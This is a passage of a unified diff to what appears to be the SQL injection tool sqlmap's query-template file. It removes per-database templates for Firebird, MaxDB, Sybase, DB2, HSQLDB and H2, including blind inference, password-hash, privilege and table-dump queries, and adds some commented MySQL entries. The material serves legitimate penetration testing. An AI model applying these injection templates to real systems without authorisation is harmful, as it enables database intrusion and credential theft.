-   <dbms value="Firebird">
-        <cast query="TRIM(CAST(%s AS VARCHAR(10000)))"/>
-        <length query="CHAR_LENGTH(TRIM(%s))"/>
-        <delimiter query="||"/>
-        <limit query="ROWS %d TO %d"/>
-        <limitregexp query="\s+ROWS\s+([\d]+)(\s+TO\s+([\d]+))?"/>
-        <limitgroupstart query="1"/>
-        <limitgroupstop query="2"/>
-        <limitstring query=" ROWS "/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <order query="ORDER BY %s ASC"/>
-        <comment query="--"/>
-        <count query="COUNT(%s)"/>
-        <substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT IIF(%s,1,0)"/>
-        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1))>%d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1)>'%c'"/>
-        <banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version="&gt;=2.1"/>
-        <current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
-        <current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="CURRENT_USER='SYSDBA'"/>
-        <users>
-            <inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
-            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
-        </users>
-        <tables>
-            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)"/>
-            <blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)"/>
-        </tables>
-        <privileges>
-            <inband query="SELECT RDB$USER,RDB$PRIVILEGE FROM RDB$USER_PRIVILEGES" condition="RDB$USER"/>
-            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'" count="SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"/>
-        </privileges>
-        <roles/>
-        <statements/>
-        <dbs/>
-        <columns>
-            <!--<inband query="SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
-            <inband query="SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" condition="r.RDB$FIELD_NAME"/>
-            <blind query="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'" count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" condition="r.RDB$FIELD_NAME"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT FIRST 1 SKIP %d %s FROM %s" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <search_db/>
-        <search_table>
-            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0) AND %s" condition="RDB$RELATION_NAME" condition2=""/>
-            <blind query="" query2="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)" count="" count2="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)" condition="RDB$RELATION_NAME" condition2=""/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT r.RDB$RELATION_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" condition="r.RDB$FIELD_NAME" condition2="" condition3="r.RDB$RELATION_NAME"/>
-            <blind query="" query2="SELECT DISTINCT(r.RDB$RELATION_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" count="" count2="SELECT COUNT(DISTINCT(r.RDB$RELATION_NAME)) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" condition="r.RDB$FIELD_NAME" condition2="" condition3="r.RDB$RELATION_NAME"/>
-        </search_column>
-   </dbms>
-
-   <dbms value="SAP MaxDB">
-        <length query="LENGTH(%s)"/>
-        <isnull query="VALUE(%s,' ')" query2="IFNULL(%s,' ')"/>
-        <delimiter query=","/>
-        <limit query="LIMIT %d,%d"/>
-        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"/>
-        <limitgroupstart query="1"/>
-        <limitgroupstop query="2"/>
-        <!-- No real cast on SAP MaxDB -->
-        <cast query="REPLACE(CHR(%s),' ','_')"/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="#"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="CONCAT(%s,%s)"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM VERSIONS"/>
-        <hex query="HEX(%s)"/>
-        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
-        <banner query="SELECT ID FROM SYSINFO.VERSION"/>
-        <current_user query="SELECT USER() FROM VERSIONS"/>
-        <current_db query="SELECT USER() FROM VERSIONS"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="EXISTS(SELECT USER_ID FROM domain.users WHERE username=USER() AND usermode='SYSDBA')"/>
-        <users>
-            <inband query="SELECT username FROM domain.users"/>
-            <blind query="SELECT MIN(username) FROM domain.users WHERE username>'%s'" count="SELECT CHR(COUNT(*)) FROM domain.users"/>
-        </users>
-        <columns>
-            <inband query="SELECT columnname,datatype,len FROM domain.columns WHERE tablename='%s' AND schemaname=%s"/>
-            <blind/>
-        </columns>
-        <tables>
-            <inband query="SELECT tablename FROM domain.tables WHERE schemaname=%s AND type='TABLE'"/>
-            <blind/>
-        </tables> 
-        <dbs>
-            <inband query="SELECT DISTINCT(schemaname) FROM domain.tables"/>
-            <blind/>
-        </dbs>
-        <roles>
-            <inband query="SELECT owner,role FROM domain.roles" condition="owner"/>
-            <blind/>
-        </roles>
-        <statements/>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schemaname FROM domain.tables WHERE %s" condition="schemaname"/>
-            <blind query="SELECT DISTINCT(schemaname) FROM domain.tables WHERE %s" count="SELECT COUNT(DISTINCT(schemaname)) FROM domain.tables WHERE %s" condition="schemaname"/>
-        </search_db>
-   </dbms>
-
-    <dbms value="Sybase">
-        <cast query="CONVERT(VARCHAR(4000),%s)"/>
-        <length query="LTRIM(STR(LEN(%s)))"/>
-        <isnull query="ISNULL(%s,' ')"/>
-        <delimiter query="+"/>
-        <limit query="SELECT TOP %d "/>
-        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
-        <limitgroupstart query="2"/>
-        <limitgroupstop query="1"/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*"/>
-        <substring query="SUBSTRING((%s),%d,%d)"/>
-        <concatenate query="%s+%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <hex query="BINTOSTR(CONVERT(VARBINARY,%s))"/>
-        <inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
-        <banner query="SELECT @@VERSION"/>
-        <current_user query="SELECT SUSER_NAME()"/>
-        <current_db query="SELECT DB_NAME()"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="PATINDEX('%sa_role%',SHOW_ROLE())>0" query2="EXISTS(SELECT * FROM master..syslogins,master..sysloginroles WHERE srid=0 and name='%s')"/>
-        <users>
-            <inband query="SELECT name FROM master..syslogins"/>
-            <blind/>
-        </users>
-        <passwords>
-            <inband query="SELECT name,password FROM master..syslogins" condition="name"/>
-            <blind/>
-        </passwords>
-        <privileges/>
-        <roles>
-            <inband query="SELECT name,srid FROM master..syslogins,master..sysloginroles" condition="name"/>
-            <blind/>
-        </roles>
-        <statements/>
-        <dbs>
-            <inband query="SELECT name FROM master..sysdatabases"/>
-            <blind/>
-        </dbs>
-        <tables>
-            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U')"/>
-            <blind/>
-        </tables>
-        <columns>
-            <inband query="SELECT %s..syscolumns.name,%s..syscolumns.usertype FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
-            <blind/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
-            <blind/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') AND " condition="name" condition2="name"/>
-            <blind/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
-            <blind/>
-        </search_column>
-    </dbms>
-
-    <dbms value="IBM DB2">
-        <!-- Casting to varchar does not work with version < v9, so we had to use char(254) instead -->
-        <cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
-        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="ROW_NUMBER() OVER () AS CAP %s) AS qq WHERE CAP"/>
-        <limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
-        <limitgroupstart/>
-        <limitgroupstop/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <!-- TODO -->
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1"/>
-        <hex query="HEX(%s)"/>
-        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
-        <!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
-        <banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS CAP,versionnumber FROM sysibm.sysversions) AS qq WHERE CAP=1"/>
-        <current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
-        <!-- NOTE: On DB2 we use the current user as default schema (database) -->
-        <current_db query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
-        <hostname query="SELECT host_name FROM TABLE(sysproc.env_get_sys_info())"/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
-        <users>
-            <inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
-            <blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS CAP,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE CAP=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
-        </users>
-        <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
-        <passwords/>
-        <privileges>
-            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
-            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS CAP,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
-        </privileges>
-        <roles/>
-        <statements/>
-        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
-        <dbs>
-            <inband query="SELECT schemaname FROM syscat.schemata"/>
-            <blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS CAP,schemaname FROM syscat.schemata) AS qq WHERE CAP=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
-            <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS CAP,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE CAP=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
-            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS CAP,%s AS ENTRY_VALUE FROM %s) AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
-            <blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS qq" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT tabschema,tabname FROM sysstat.tables WHERE %s" condition="tabname" condition2="tabschema"/>
-            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT tabschema,tabname FROM sysstat.columns WHERE %s" condition="colname" condition2="tabschema" condition3="tabname"/>
-            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
-        </search_column>
-    </dbms>
-
-    <dbms value="HSQLDB">
-        <cast query="CAST(%s AS LONGVARCHAR)"/>
-        <length query="CHAR_LENGTH(%s)"/>
-        <isnull query="IFNULL(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
-        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
-        <limitgroupstart query="2"/>
-        <limitgroupstop query="1"/>
-        <limitstring query=" LIMIT "/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*" query3="//"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="CONCAT(%s,%s)"/>
-        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <!-- NOTE: RAWTOHEX() doesn't accept non-binary values -->
-        <!-- <hex query="RAWTOHEX(%s)"/> -->
-        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
-        <banner query="DATABASE_VERSION()"/>
-        <current_user query="CURRENT_USER"/>
-        <current_db query="DATABASE()"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER_NAME=CURRENT_USER"/>
-        <check_udf/>
-        <users>
-            <!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
-            <blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
-            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user"/>
-        </users>
-        <passwords>
-            <!-- Passwords only shown in later versions &gt;=2.0  -->
-            <blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
-            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name" condition="user_name"/>
-        </passwords>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <dbs>
-            <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
-        </dbs>
-        <tables>
-            <blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem" condition="table_schem"/>
-        </tables>
-        <columns>
-            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
-            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" condition="column_name"/>
-        </columns>
-        <dump_table>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-        </dump_table>
-        <search_db>
-            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
-        </search_db>
-        <search_table>
-            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'" condition="table_name" condition2="table_schem"/>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
-        </search_table>
-        <search_column>
-            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'" condition="column_name" condition2="table_schem" condition3="table_name"/>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
-        </search_column>
-    </dbms>
-
-    <dbms value="H2">
-        <cast query="CAST(%s AS LONGVARCHAR)"/>
-        <length query="CHAR_LENGTH(%s)"/>
-        <isnull query="IFNULL(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="LIMIT %d OFFSET %d"/>
-        <limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
-        <limitgroupstart query="2"/>
-        <limitgroupstop query="1"/>
-        <limitstring query=" OFFSET "/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="//"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <hex query="RAWTOHEX(%s)"/>
-        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
-        <banner query="H2VERSION()"/>
-        <current_user query="CURRENT_USER"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
+        <banner query="VERSION()"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
         <current_db query="DATABASE()"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="SELECT CURRENT_USER='SA'"/>
-        <check_udf/>
-        <users>
-            <inband query="SELECT NAME FROM INFORMATION_SCHEMA.USERS"/>
-            <blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS LIMIT 1 OFFSET %d" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
-        </users>
-        <passwords/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <dbs>
-            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
-            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET %d" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES" condition="TABLE_SCHEMA"/>
-            <blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
-        </tables>
-        <columns>
-            <blind query="SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" query2="SELECT TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'" count="SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'" condition="COLUMN_NAME"/>
-            <inband query="SELECT COLUMN_NAME,TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" condition="COLUMN_NAME"/>
-        </columns>
-        <dump_table>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-        </dump_table>
-        <search_db>
-            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="SCHEMA_NAME"/>
-            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="SCHEMA_NAME"/>
-        </search_db>
-        <search_table>
-            <blind query="SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY 1" query2="SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' ORDER BY 1" count="SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'" condition="TABLE_NAME" condition2="TABLE_SCHEMA"/>
-            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="TABLE_NAME" condition2="TABLE_SCHEMA"/>
-        </search_table>
-        <search_column>
